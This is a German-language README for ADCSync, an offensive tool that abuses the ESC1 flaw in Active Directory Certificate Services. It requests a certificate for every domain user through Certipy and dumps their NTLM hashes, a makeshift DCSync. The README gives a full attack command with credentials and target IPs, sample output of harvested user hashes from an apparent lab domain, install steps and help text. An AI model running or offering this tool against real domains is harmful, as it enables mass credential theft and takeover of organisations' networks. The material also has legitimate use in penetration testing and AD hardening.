
Verwende ESC1, um einen provisorischen DCSync durchzuführen und Hashes zu extrahieren.
Dies ist ein Tool, das ich schnell zusammengestellt habe, um DCSync mittels ESC1 durchzuführen. Es ist recht langsam, aber dennoch eine effektive Methode, einen provisorischen DCSync-Angriff ohne Nutzung von DRSUAPI oder Volume Shadow Copy durchzuführen.
Dies ist die erste Version des Tools und automatisiert im Wesentlichen nur den Prozess, Certipy gegen jeden Benutzer in einer Domäne auszuführen. Es bedarf noch viel Arbeit und ich plane, in Zukunft weitere Funktionen für Authentifizierungsmethoden hinzuzufügen und den Prozess der Suche nach einer verwundbaren Vorlage zu automatisieren.
python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt
___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/
/____/
Grabbing user certs:
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 105/105 [02:18<00:00, 1.32s/it]
THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::
THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::
THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::
THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::
THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::
THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::
THEGRID.LOCAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::
THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::
THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::
ADCSync nutzt den ESC1-Exploit, um NTLM-Hashes von Benutzerkonten in einer Active-Directory-Umgebung zu extrahieren. Das Tool ruft zunächst jeden Benutzer und jede Domäne aus der übergebenen Bloodhound-Dump-Datei ab. Dann verwendet es Certipy, um für jeden Benutzer eine Anfrage zu stellen und deren PFX-Datei im Zertifikatsverzeichnis zu speichern. Schließlich authentifiziert es sich mit Certipy über das Zertifikat und ruft den NT-Hash für jeden Benutzer ab. Dieser Prozess ist recht langsam und kann eine Weile dauern, bietet aber eine alternative Möglichkeit, NTLM-Hashes zu extrahieren.
git clone https://github.com/JPG0mez/adcsync.git
cd adcsync
pip3 install -r requirements.txt
Um dieses Tool zu verwenden, benötigen wir die folgenden Dinge:
certipy find)# python3 adcsync.py --help
___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/
/____/
Usage: adcsync.py [OPTIONS]
Options:
-f, --file TEXT Input User List JSON file from Bloodhound [required]
-o, --output TEXT NTLM Hash Output file [required]
-ca TEXT Certificate Authority [required]
-dc-ip TEXT IP Address of Domain Controller [required]
-u, --user TEXT Username [required]
-p, --password TEXT Password [required]
-template TEXT Template Name vulnerable to ESC1 [required]
-target-ip TEXT IP Address of the target machine [required]
--help Show this message and exit.
certipy find, um Vorlagen zu finden, die anfällig für ESC1 sind